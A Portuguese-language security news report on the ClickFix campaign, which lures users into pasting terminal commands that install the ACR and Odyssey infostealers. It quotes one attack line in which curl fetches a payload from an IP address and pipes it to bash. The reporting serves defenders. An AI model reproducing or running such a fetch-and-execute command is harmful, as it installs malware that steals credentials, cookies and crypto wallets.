Hack Alerta

Campanha ClickFix engana usuários e instala infostealers

Por Redação Hack Alerta Publicado em 14/11/2025 05:02 Riscos e Ameaças Tempo de leitura: 3 min

A campanha ClickFix induz vítimas a colar comandos em terminais, distribuindo infostealers distintos por plataforma: ACR em Windows e Odyssey em macOS. A técnica, identificada pela Intel471, usa páginas hospedadas em serviços de cloud para evitar bloqueio e executa payloads em memória, dificultando detecção tradicional.

Uma técnica de engenharia social batizada ClickFix vem sendo usada para induzir vítimas a colar comandos no terminal do sistema operacional, resultando em download e execução de infostealers em Windows e macOS.

Descoberta e escopo

Pesquisa da Intel471 identificou a campanha durante operações de hunting em junho de 2025. A infraestrutura emprega páginas maliciosas hospedadas em plataformas confiáveis (Google Colab, Drive, Sites, Groups) que servem de redirecionamento conforme o sistema operacional da vítima. O fluxo atinge tanto usuários Windows quanto macOS a partir de um único conjunto de páginas.

Vetor e execução técnica

O ataque explora a ação do usuário ao buscar software pirata ou cracks em mecanismos de busca. Usuários chegam a páginas que simulam verificações legítimas (um falso "Cloudflare human check" é citado nas análises). O mecanismo de fraude convence a vítima a copiar um trecho de texto que, na prática, contém um comando Base64 (no macOS) ou um link para um arquivo ZIP protegido por senha hospedado em MEGA (para Windows).

No caso macOS, o comando base64 decodificado resulta em um curl que baixa e executa o infostealer Odyssey. Um exemplo citado nas fontes é:

curl - s http://45.135.232.33/droberto39774 | nohup bash

Em Windows, o fluxo termina em um arquivo ZIP contendo um executável disfarçado (ex.: setup.exe) que ativa o ACR stealer. O ACR atua como loader e pode instalar componentes adicionais, incluindo clipboard hijackers como SharkClipper.

Características operacionais

  • Execução fileless quando o conteúdo é puxado diretamente para memória (reduz visibilidade em antivírus tradicionais)
  • Infraestrutura que se apoia em serviços de cloud públicos para evitar bloqueio inicial
  • Diferenciação de payloads por sistema operacional: ACR para Windows; Odyssey para macOS
  • Capacidade de roubar credenciais, cookies, carteiras de criptomoeda e dados locais (Keychain/Apple Notes em macOS)

Impacto e setores afetados

Embora as fontes não apresentem uma contagem consolidada de vítimas, a técnica é descrita como «altamente eficaz» por contornar controles tradicionais de entrega de malware (e‑mail, sandboxes). Usuários que procuram software pirata ou seguem instruções encontradas em páginas não verificadas estão em maior risco.

Mitigações práticas

As evidências técnicas permitem recomendações claras: evitar colar comandos vindos de páginas não verificadas; desconfiar de páginas que simulam verificações de segurança e pedem execução de comandos; bloquear hosts e IPs associados quando identificados; e monitorar processos que fazem download via curl/wget seguidos de execução no endpoint. Soluções EDR/HIPS que investigam execução em memória e anomalias de shell devem ser priorizadas.

Limites das informações

As fontes descrevem a infraestrutura e amostras observadas, incluindo o uso de MEGA e domínios de download. No entanto, não há um mapeamento público extensivo de vítimas nem um atribuição definitiva dos operadores além das descrições técnicas e dos artefatos coletados.

Baseado em publicação original de Cyber Security News
Tags: #clickfix #infostealer #macos #windows #intel471 #fileless #acr #odyssey #social-engineering
Publicado pela Redação Hack Alerta com base em fontes externas citadas e monitoramento editorial do Hack Alerta. Para decisões técnicas, operacionais ou jurídicas, confirme sempre os detalhes na fonte original.
← Voltar